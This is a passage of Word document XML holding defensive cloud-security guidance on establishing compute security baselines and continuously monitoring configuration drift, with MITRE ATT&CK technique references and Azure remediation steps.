      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58654CE9" w14:textId="60D3A3B9" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Operating system vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B795C" w14:textId="7DD59306" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Default OS installations contain unnecessary services, weak authentication settings, and missing security patches that provide attack vectors for privilege escalation and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963463B" w14:textId="28F09D97" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Container security gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC2F34" w14:textId="09D7BBC5" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Container images built without security hardening contain vulnerable base layers, excessive privileges, and insecure runtime configurations that enable container escape and host compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A51BA9" w14:textId="24CF87E9" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Service configuration weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F6FC2C" w14:textId="4C66E778" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Applications and services deployed with default configurations often enable unnecessary features, use weak credentials, and lack proper access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBC0FC" w14:textId="7973D0B3" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Persistent access opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC7BD6" w14:textId="5FBA0AF5" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Compute resources with weak security baselines provide attackers with stable footholds for maintaining long-term access and conducting reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C32D3" w14:textId="074A1572" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Scale amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74063C66" w14:textId="7C3680FF" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Cloud auto-scaling and orchestration systems replicate insecure compute configurations across hundreds of instances, amplifying the impact of baseline security weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D48D5B" w14:textId="1F8C78F2" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Compliance violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43889475" w14:textId="52007A07" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve">Regulatory standards require specific security configurations for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t>compute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve"> resources-insecure baselines create demonstrable compliance gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCCE1AD" w14:textId="1B31AEBE" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4E1795" w14:textId="38E5F974" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6BE69" w14:textId="7A14D6DD" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:t>exploit public-facing application (T1190) targeting services running on insecurely configured compute resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3836DF" w14:textId="21B556FB" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:lastRenderedPageBreak/>
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2DD9B" w14:textId="55B46725" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:t>command and scripting interpreter (T1059) leveraging weak compute security to execute malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C325703" w14:textId="5E68CBE5" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D5F15" w14:textId="7DB3DF11" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:t>create or modify system process (T1543) exploiting weak compute baselines to establish persistent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3DF93" w14:textId="40BF5E27" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C80F0" w14:textId="1DAE0408" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:t>impair defenses (T1562) disabling security controls on weakly configured compute resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD24E8B" w14:textId="4DDB88D1" w:rsidR="00A56F98" w:rsidRDefault="00A56F98" w:rsidP="00A56F98">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-3.1: Establish compute security baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36186F78" w14:textId="0073922D" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve">Implement </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t>compute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve"> security hardening through standardized baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71560AA1" w14:textId="69995FF4" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Apply operating system security baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF52FF8" w14:textId="77DFF828" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Use Azure security baselines for Windows and Linux operating systems to enforce CIS benchmarks and Microsoft security recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD268CA" w14:textId="64046961" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Create hardened virtual machine images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B57627" w14:textId="4CFEAE0C" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Use Azure Image Builder to create hardened VM images with security configurations pre-applied before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90BE81" w14:textId="5CD15880" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Establish container security baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9ED723" w14:textId="7E0E23B7" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Apply container security standards using Microsoft Defender for Containers recommendations for image hardening and runtime protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757C434C" w14:textId="77777777" w:rsidR="00420A04" w:rsidRDefault="00420A04" w:rsidP="00420A04"/>
    <w:p w14:paraId="2DF183A1" w14:textId="0D670508" w:rsidR="00420A04" w:rsidRDefault="00420A04" w:rsidP="00420A04">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc242449548"/>
      <w:r w:rsidRPr="00420A04">
        <w:t>Monitor and enforce compliance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="508F28E0" w14:textId="4C2AB9B4" w:rsidR="00420A04" w:rsidRDefault="00420A04" w:rsidP="00420A04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc242449549"/>
      <w:r w:rsidRPr="00420A04">
        <w:t>PV-2: Audit and enforce secure configurations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="409815C3" w14:textId="0CE2D77C" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC2C19" w14:textId="0049EE11" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Continuously monitor and alert on deviations from defined configuration baselines. Enforce desired configurations through automated remediation that denies non-compliant configurations or automatically deploys corrective configurations to maintain security posture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEAF21" w14:textId="79BD8EDF" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00420A04">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="550ED44D" w14:textId="249F7368" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Silent configuration drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF68AD" w14:textId="0F47B6B0" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Manual changes, emergency modifications, and incremental updates gradually weaken security configurations without triggering alerts-resulting in environments that appear secure but contain exploitable gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F71CB7" w14:textId="0B5E5539" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Compliance degradation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AECCD0" w14:textId="1A741A4F" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Systems initially deployed with compliant configurations drift away from regulatory requirements through normal operational changes, creating audit findings and certification risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C693E45" w14:textId="233B807E" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Inconsistent enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD92D4" w14:textId="5AD1BE92" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Different teams applying security configurations manually introduce variations and omissions that create security weak points throughout the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F1294" w14:textId="78FA5703" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Emergency change exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D67C04" w14:textId="59F6450A" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>High-pressure situations lead to security bypasses and temporary configurations that become permanent, eroding overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02310F18" w14:textId="465F4E59" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Scale amplification of drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D65B05" w14:textId="20AE1B8D" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>In cloud environments, configuration changes replicate across multiple resources through automation-a single drift event can weaken hundreds of resources simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57884DCA" w14:textId="2C7EEE51" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Undetected misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C6099" w14:textId="3327A81B" w:rsidR="00420A04" w:rsidRDefault="00420A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00420A04">
        <w:t>Without automated monitoring, security misconfigurations remain undetected for extended periods, providing persistent opportunities for attacker exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6152B" w14:textId="1185807C" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E5EBB" w14:textId="4E07375F" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89AB4D" w14:textId="485FC15D" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:t>impair defenses (T1562) exploiting configuration drift to disable or weaken security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E1038" w14:textId="77777777" w:rsidR="007C1339" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A643CB6" w14:textId="7D130119" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>modify authentication process (T1556) leveraging weakened authentication configurations that drifted from secure baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18F133" w14:textId="68F4D47A" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3DA7BA" w14:textId="45406DFD" w:rsidR="007C1339" w:rsidRDefault="007C1339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1339">
        <w:t>cloud infrastructure discovery (T1580) identifying misconfigured resources through systematic enumeration of configuration weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085A817" w14:textId="0B150830" w:rsidR="00A56F98" w:rsidRPr="000774C4" w:rsidRDefault="000774C4" w:rsidP="000774C4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-2.1: Implement continuous configuration monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD35B8" w14:textId="0F6C24B4" w:rsidR="00C47351" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Maintain security baseline compliance through continuous monitoring and enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F6EEF" w14:textId="53940ACD" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Configure continuous configuration assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535EC56A" w14:textId="0F7044F4" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Use Microsoft Defender for Cloud to continuously assess resource configurations against security recommendations and identify deviations from baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151766DD" w14:textId="77777777" w:rsidR="00A701DE" w:rsidRDefault="00A701DE" w:rsidP="00A701DE"/>
    <w:p w14:paraId="674AF156" w14:textId="77777777" w:rsidR="00A701DE" w:rsidRDefault="00A701DE" w:rsidP="00A701DE"/>
    <w:p w14:paraId="003D42E5" w14:textId="77777777" w:rsidR="000774C4" w:rsidRDefault="000774C4" w:rsidP="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABB9950" w14:textId="402D510F" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Implement policy-based monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A27DD" w14:textId="0DC6BF70" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Deploy Azure Policy with audit and enforcement effects to monitor and control resource configurations across all subscriptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D90ED" w14:textId="07BE0AB4" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Create configuration deviation alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE1444" w14:textId="3846C321" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Use Azure Monitor to create alerts when configuration deviations are detected, triggering investigation and remediation workflows.</w:t>
      </w:r>
    </w:p>
